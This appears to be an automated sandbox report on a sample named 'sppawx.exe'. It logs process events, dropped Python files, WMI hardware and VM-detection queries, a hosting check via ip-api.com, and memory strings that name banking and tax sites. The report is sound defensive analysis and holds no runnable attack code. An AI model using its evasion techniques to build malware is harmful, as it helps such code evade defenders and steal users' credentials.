Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7381	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2140	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7575
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1824
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7202
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2354
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3062
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3025
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3138
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3846
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4325
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3742
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 541
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3216
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1230

Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\select.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\unicodedata.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\sppawx.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-17526

Source: C:\Users\user\Desktop\sppawx.exe

API coverage: 8.1 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424	Thread sleep count: 7381 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424	Thread sleep count: 2140 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660	Thread sleep count: 7575 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 1824 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2900	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268	Thread sleep count: 7202 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964	Thread sleep count: 2354 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020	Thread sleep count: 3062 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020	Thread sleep count: 162 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3728	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6232	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484	Thread sleep count: 3846 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056	Thread sleep count: 42 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4356	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620	Thread sleep count: 4325 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620	Thread sleep count: 500 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep count: 3742 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028	Thread sleep count: 541 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1792	Thread sleep count: 3216 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1792	Thread sleep count: 1230 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF79A3183B0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3192F0 FindFirstFileExW,FindClose,	0_2_00007FF79A3192F0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF79A3318E4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3192F0 FindFirstFileExW,FindClose,	2_2_00007FF79A3192F0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF79A3183B0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF79A3318E4
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256D46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	103_2_00007FF6256D46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6257188E0 FindFirstFileExA,	103_2_00007FF6257188E0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256CE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	103_2_00007FF6256CE21C

Source: C:\Users\user\Desktop\sppawx.exe

Code function: 2_2_00007FFEDD2A0180 GetSystemInfo,

2_2_00007FFEDD2A0180

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: getmac.exe, 0000004F.00000003.1514289207.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000002.1515569310.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514721736.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696503903o
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: getmac.exe, 0000004F.00000003.1514289207.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514657123.00000284F69BE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000002.1515569310.00000284F69C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport!
Source: getmac.exe, 0000004F.00000002.1515569310.00000284F698F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514721736.00000284F698E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514289207.00000284F698C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"t"
Source: getmac.exe, 0000004F.00000003.1514721736.00000284F698E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514289207.00000284F698C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V{
Source: sppawx.exe, 00000002.00000003.1325460441.0000018C014F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514289207.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000002.1515569310.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514721736.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696503903\|UE
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: d2qemu-ga
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
